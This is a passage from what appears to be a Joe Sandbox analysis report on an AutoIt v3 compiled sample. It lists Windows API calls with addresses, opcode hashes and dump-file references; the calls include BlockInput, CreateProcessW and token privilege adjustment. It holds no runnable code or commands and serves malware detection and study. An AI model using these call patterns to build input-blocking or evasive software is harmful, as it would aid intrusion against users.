                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00ACB8D7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 81990902-0
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00AFF59C
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00B0F3AD,?,?,?,?), ref: 00AFF5C6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: 89d2e2a9b3edc6d1b5b4a75c6259f20c83f908ed3baeab86e6d50b1be6131d30
                                                                                                                                                        • Instruction ID: 3e937419ef28ecd2064bde4c17385f1f7f62b27c2fbb27b7f326901f0b1fe00d
                                                                                                                                                        • Opcode Fuzzy Hash: 89d2e2a9b3edc6d1b5b4a75c6259f20c83f908ed3baeab86e6d50b1be6131d30
                                                                                                                                                        • Instruction Fuzzy Hash: B9E0C27010422CBFEB141F19DC0AFB93B28FB00B50F10C526FA57C90E0DBB088A0D660
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,00A9125D,00AB7A43,00A90F35,?,?,00000001), ref: 00AB8E41
                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AB8E4A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                                                                                                                                                        • Instruction ID: 0a2f519658063e377239753cdaf68f5dd3ba06571924ff205d1add3dcd942e01
                                                                                                                                                        • Opcode Fuzzy Hash: 7ee4ee3016e1c8ce53920bf499f65ed640a3f359f174af64936cf181d916d132
                                                                                                                                                        • Instruction Fuzzy Hash: FFB09271044A08ABEA002BA1FC09BC83F78EB08A62F808010F62D46060CF6354508A9A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                                                                                                                                                        • Instruction ID: 6ae55884aa5d8c46373ceb529d11c3d855a50f23ae4f833510b44d739e7841f5
                                                                                                                                                        • Opcode Fuzzy Hash: 96e724d42ecc4ef5b946502ac56e706b206c3754894f134d4587f8184bcdb65d
                                                                                                                                                        • Instruction Fuzzy Hash: 3EB1CF20E2AF404DD63396398831337B65CAFBB2D5F92D71BFC6A75D62EB2185834180
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 00B00352
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        • Opcode ID: bb38566137cd3ef12ad9596179e863b833180ec6b3097473c7dc50f3e5f8bbda
                                                                                                                                                        • Instruction ID: f0424d8de33fb553c5b8ea1520154df63fb537949c23f94f8c53bbf563c99c88
                                                                                                                                                        • Opcode Fuzzy Hash: bb38566137cd3ef12ad9596179e863b833180ec6b3097473c7dc50f3e5f8bbda
                                                                                                                                                        • Instruction Fuzzy Hash: 81113A31214219BBFB263B2CCD45FBD3E94E749720F244395FA115B1E2CFA48D01D269
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAB155: GetWindowLongW.USER32(?,000000EB), ref: 00AAB166
                                                                                                                                                        • CallWindowProcW.USER32(?,?,00000020,?,?), ref: 00AFE7AF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CallLongProc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4084987330-0
                                                                                                                                                        • Opcode ID: 67de2472e679c40278b920cb143cba0e15b41265441382de15172600d3edae17
                                                                                                                                                        • Instruction ID: 911f959172b4a7afd993071f0b626d9d5abce4c389d91acf83bca25e4c855cf2
                                                                                                                                                        • Opcode Fuzzy Hash: 67de2472e679c40278b920cb143cba0e15b41265441382de15172600d3edae17
                                                                                                                                                        • Instruction Fuzzy Hash: F3F0EC3610010CAFCF15EF98DC449B93BA6EB04361B448554FA558B6B1CB329D60EB50
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00B0F417,?,?,?,?,?,00000001,?), ref: 00AFEA9C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2356834413-0
                                                                                                                                                        • Opcode ID: eca3dfbfa006bb3b89cb33698cfa75cc4d7280e0661f48ff3641c1c15f3f5531
                                                                                                                                                        • Instruction ID: c5a67a0efd8bb34a4b49435260985a2bc23044abd15d7ef10f11eabc84748c2a
                                                                                                                                                        • Opcode Fuzzy Hash: eca3dfbfa006bb3b89cb33698cfa75cc4d7280e0661f48ff3641c1c15f3f5531
                                                                                                                                                        • Instruction Fuzzy Hash: 62F0A031200229ABDB14AF19CC0AFBE3FA1FB01791F004055FA061B1E2DBB69C61DBE1
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000006,?,?,?,?,00AAAF40,?,?,?,?,?), ref: 00AAB83B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        APIs
                                                                                                                                                        • BlockInput.USER32(00000001), ref: 00AE7057
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BlockInput
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3456056419-0
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00AFF41A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 00AAACC7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2065330234-0
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,00B0F3D4,?,?,?,?,?,?), ref: 00AFF450
                                                                                                                                                          • Part of subcall function 00AFE13E: _memset.LIBCMT ref: 00AFE14D
                                                                                                                                                          • Part of subcall function 00AFE13E: _memset.LIBCMT ref: 00AFE15C
                                                                                                                                                          • Part of subcall function 00AFE13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00B53EE0,00B53F24), ref: 00AFE18B
                                                                                                                                                          • Part of subcall function 00AFE13E: CloseHandle.KERNEL32 ref: 00AFE19D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2364484715-0
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00AFF3D0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        • Opcode ID: 2e7355bc0ca166f4570d77eba903601f5f9a3cfaecd51dfd8a6157aa96c9e5f8
                                                                                                                                                        • Instruction ID: 4ae0a078be8cf75048a9e841b2bbd36276976620201a96626a728e93d4aba47c
                                                                                                                                                        • Opcode Fuzzy Hash: 2e7355bc0ca166f4570d77eba903601f5f9a3cfaecd51dfd8a6157aa96c9e5f8
                                                                                                                                                        • Instruction Fuzzy Hash: DFE0E23420020CEFCB01DF88D844E8A3BA5FB1A350F004094FD048B262CB72A820EBA1
                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL ref: 00AFF3A1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DialogNtdllProc_
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3239928679-0
                                                                                                                                                        • Opcode ID: 353f72b2a459c2407eb1189226af20b97ee758ed52763a12d408b002853f5564
                                                                                                                                                        • Instruction ID: 9e470303c7122b3d40a68d5f95b84fd678a23a25a11632523b89e62019620c4f
                                                                                                                                                        • Opcode Fuzzy Hash: 353f72b2a459c2407eb1189226af20b97ee758ed52763a12d408b002853f5564
                                                                                                                                                        • Instruction Fuzzy Hash: 27E0E23420420CEFCB01DF88D844E8A3BA5FB2A350F004094FD048B261CB72A820DB61
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00AAB85B), ref: 00AAB926
                                                                                                                                                          • Part of subcall function 00AAB86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,00AAB85B,00000000,?,?,00AAAF1E,?,?), ref: 00AAB9BD
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00AAAF1E,?,?), ref: 00AAB864
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2797419724-0
                                                                                                                                                        • Opcode ID: ca499ba5a2aea2bd08bb64367a42f0ac39775e400ed238d8e4f0335fc421017e
                                                                                                                                                        • Instruction ID: ef8b0a771bd240095e6de1d21fa5f3436a2043325753c8056e001a4b74243a60
                                                                                                                                                        • Opcode Fuzzy Hash: ca499ba5a2aea2bd08bb64367a42f0ac39775e400ed238d8e4f0335fc421017e
                                                                                                                                                        • Instruction Fuzzy Hash: 36D0127118430C77DB102B65DD07F4D7A5EAB15751F408421FA056B1E2CB7264109565
                                                                                                                                                        APIs
                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AB8E1F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                        • Opcode ID: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                                                                                                                                                        • Instruction ID: 13f71073e4ea7e2e3f1ceaa3f620c2e4bcd29c809b0b408e686cb78b51cca6fb
                                                                                                                                                        • Opcode Fuzzy Hash: 3e27e88905a2393eb9ec4096fd91c93afe6810c1a521af9cc91dc54a50c41df6
                                                                                                                                                        • Instruction Fuzzy Hash: 4BA0123000050CA78A001B51FC044847F6CD7041507408010F41C01021CB3354104585
                                                                                                                                                        APIs
                                                                                                                                                        • GetProcessHeap.KERNEL32(00AB6AE9,00B467D8,00000014), ref: 00ABA937
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                        • Opcode ID: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                                                                                                                                                        • Instruction ID: 5b536f11215bb9542e2cdb5f415b0246551fd94a314fb2a4c07a4eec43c1329f
                                                                                                                                                        • Opcode Fuzzy Hash: cf4aaa9ff2071ebacdb6ef3805598f9ceefcf21614f97d20890965d8d7f8e10f
                                                                                                                                                        • Instruction Fuzzy Hash: 0DB012F07032034BD7084B3CAC5429E39D45789202341807D7403C3560DF308420DF00
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction ID: 422c92e37a84fd0bd7deeea60af2656a1df043facff242247779199923cc39da
                                                                                                                                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                                                                                        • Instruction Fuzzy Hash: 16C1C27220529349DF2D473EC4348BFBEA95AA27F131A0B6DD4B3CB4C6EE24D564D620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction ID: 57c9843a5601d4003124a0c714c95ce547aa97613b7c8f12504ec73d9915d870
                                                                                                                                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                                                                                        • Instruction Fuzzy Hash: 6DC1C3722052934ADF2D4739C4348BFBFA95AA27B131A476DD8B3CB4C6FE24D524D620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction ID: 321bdefa8d69cb18231f7c36d33f3eef4872f4d040a2632cbff053298a6f738a
                                                                                                                                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                                                                                                        • Instruction Fuzzy Hash: BFC1B17220529349DF2D473984348BFBFA95AA27F531A4B6DD4B3CB4C2EE24D524D620
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                        • Instruction ID: 161bb9a8234e8b02c13c3217c585bea901b04d7b018ca4cb88b7f9c96a5b7127
                                                                                                                                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                                        • Instruction Fuzzy Hash: D1C1D27220529349DF2D473984348BFFFA95EA27B131A4B6DD4B3CB4C2EE24D564C660
                                                                                                                                                        APIs
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AEA7A5
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AEA7B7
                                                                                                                                                        • DestroyWindow.USER32 ref: 00AEA7C5
                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00AEA7DF
                                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00AEA7E6
                                                                                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00AEA927
                                                                                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00AEA937
                                                                                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA97F
                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00AEA98B
                                                                                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00AEA9C5
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9E7
                                                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEA9FA
                                                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA05
                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00AEAA0E
                                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA1D
                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00AEAA26
                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAA2D
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AEAA38
                                                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 00AEAA4A
                                                                                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B1D9BC,00000000), ref: 00AEAA60
                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00AEAA70
                                                                                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00AEAA96
                                                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00AEAAB5
                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEAAD7
                                                                                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AEACC4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                        • API String ID: 2211948467-2373415609
                                                                                                                                                        APIs
                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00AFD0EB
                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00AFD11C
                                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 00AFD128
                                                                                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 00AFD142
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AFD151
                                                                                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00AFD17C
                                                                                                                                                        • GetSysColor.USER32(00000010), ref: 00AFD184
                                                                                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 00AFD18B
                                                                                                                                                        • FrameRect.USER32(?,?,00000000), ref: 00AFD19A
                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00AFD1A1
                                                                                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00AFD1EC
                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00AFD21E
                                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00AFD249
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(00000012), ref: 00AFD3BE
                                                                                                                                                          • Part of subcall function 00AFD385: SetTextColor.GDI32(?,?), ref: 00AFD3C2
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColorBrush.USER32(0000000F), ref: 00AFD3D8
                                                                                                                                                          • Part of subcall function 00AFD385: GetSysColor.USER32(0000000F), ref: 00AFD3E3
